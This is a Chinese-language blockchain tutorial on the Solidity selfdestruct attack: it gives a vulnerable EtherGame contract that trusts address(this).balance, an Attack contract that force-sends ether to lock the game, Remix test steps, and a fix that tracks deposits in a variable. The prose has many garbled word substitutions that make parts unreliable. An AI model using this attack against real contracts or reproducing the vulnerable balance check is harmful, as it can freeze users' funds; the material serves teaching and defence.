id:BSN_2021 公众号:BSN 研习社 作者:红枣科技张雪良
背景:因为公链环境下所有的信息都是共享的,智能合约相当于是齐全透明化,任何人都能够调用,外加一些利益的驱动,导致引发了很多hacker的攻打。其中self destruct攻打也是常见的攻击方式之一。
指标:将指标合约瘫痪掉,无奈做失常的业务,从而意识以及预防自毁攻打破绽。
对象:实用于用Solidity语言开发的智能合约,例如BSN中的武汉链(基于ETH)和泰安链(基于 fisco bcos)上运行的智能合约。
前言
在进入正题之前,我先带大家从根底知识点开始一点点深刻到怎么攻打以及预防。好,废话不多话,先看下selfdestruct的官网解释:
selfdestruct(address payable recipient)
Destroy the current contract, sending its funds to the given Address and end execution
了解起来也很简略,就是说合约销毁的时候,能够把ether转到指定的地址。
常见的用法 : 当咱们的合约有破绽或者业务变更的变动时,须要把它销毁掉,以防止造成更多的影响。此时能够在合约里提供一个销毁办法;
示例如下:
pragma solidity >=0.7.0 <0.9.0;contract Destructible { address payable owner; constructor() { owner = payable(msg.sender); } // 销毁合约 function destroy() public { if (msg.sender == owner){ selfdestruct(owner); } }}
当须要销毁时,合约的owner能够调用destory()
办法进行合约销毁。
那接下来,咱们正式进入主题,如何应用self-destory进行攻打。
攻打演示
1. 合约示例
演示须要用到的两个合约,一个模仿业务合约,一个为攻打合约。
业务合约:
一个简略的游戏,每个用户每次能够寄存1ether到合约里,等到第7次寄存的用户将成为赢家,能够把7ether提到本人账户里。
攻打合约:
编写了一个合约销毁的办法,即本合约销毁时会发送ether到指定的合约。
攻打逻辑:
调用攻打合约的attack办法,使得上述的业务合约余额超过7。
示例如下:
pragma solidity >=0.7.0 <0.9.0;// 业务合约contract EtherGame { uint public targetAmount = 7 ether; address public winner; // 充值ether function deposit() public payable { require(msg.value == 1 ether, "You can only send 1 Ether"); uint balance = address(this).balance; require(balance <= targetAmount, "Game is over"); if (balance == targetAmount) { winner = msg.sender; } } // 提取ether function claimReward() public { require(msg.sender == winner, "Not winner"); winner = address(0); (bool sent, ) = msg.sender.call{value: address(this).balance}(""); require(sent, "Failed to send Ether"); } // 查问以后余额 function balanceOf() public view returns (uint){ return address(this).balance; }}// 攻打合约contract Attack { EtherGame etherGame; constructor(EtherGame _etherGame) { etherGame = EtherGame(_etherGame); } // 合约销毁和发送ether function attack() public payable { // 发送ether到指定的业务合约 selfdestruct(payable(address(etherGame))); }}
2. 合约部署
老规矩,咱们应用remix进行部署测试。
部署胜利后,截图如下:
3. 失常业务操作
筹备两个账户A和B,别离为100ether。
具体操作流程为:A调用5次寄存5ether,B调用2次寄存2ether,B将成为winner,而后提取7ether。
两个账户共计调用7次后,查问余额以及winner信息,截图如下:
B账户提取ether,后果截图如下:
下面的图中能够看到,B账户胜利的提取了合约里的7 ether。
4. 攻打操作
咱们还是用下面的两个账户账户A和B。
具体操作流程为:A调用5次寄存5ether,B调用攻打合约的attack办法并发送3ether。
上图能够发现业务合约以后余额为8 ether。
上图能够看到攻打合约的owner变为0x0地址。
到此,业务合约已被攻打,即业务无奈失常进行,不能寄存以及提取。
上面,咱们进行测试depoit和claimReward的办法调用,后果信息截图如下:
解决方案
最初,给大家举荐一个罕用的计划:将全局address(this).balance改为变量统计进入deposit逻辑的ether数量。
最终代码如下所示:
pragma solidity >=0.7.0 <0.9.0;// 业务合约contract EtherGame { uint public targetAmount = 7 ether; address public winner; uint public balance;// 记录ether数量 // 充值ether function deposit() public payable { require(msg.value == 1 ether, "You can only send 1 Ether"); balance += msg.value; require(balance <= targetAmount, "Game is over"); if (balance == targetAmount) { winner = msg.sender; } } // 提取ether function claimReward() public { require(msg.sender == winner, "Not winner"); winner = address(0); (bool sent, ) = msg.sender.call{value: balance}(""); require(sent, "Failed to send Ether"); } // 查问以后余额 function balanceOf() public view returns (uint){ return address(this).balance; }}
明天的解说到此结束,感激大家的浏览,如果你有其余的想法或者倡议,欢送一块交换。
本文由mdnice多平台公布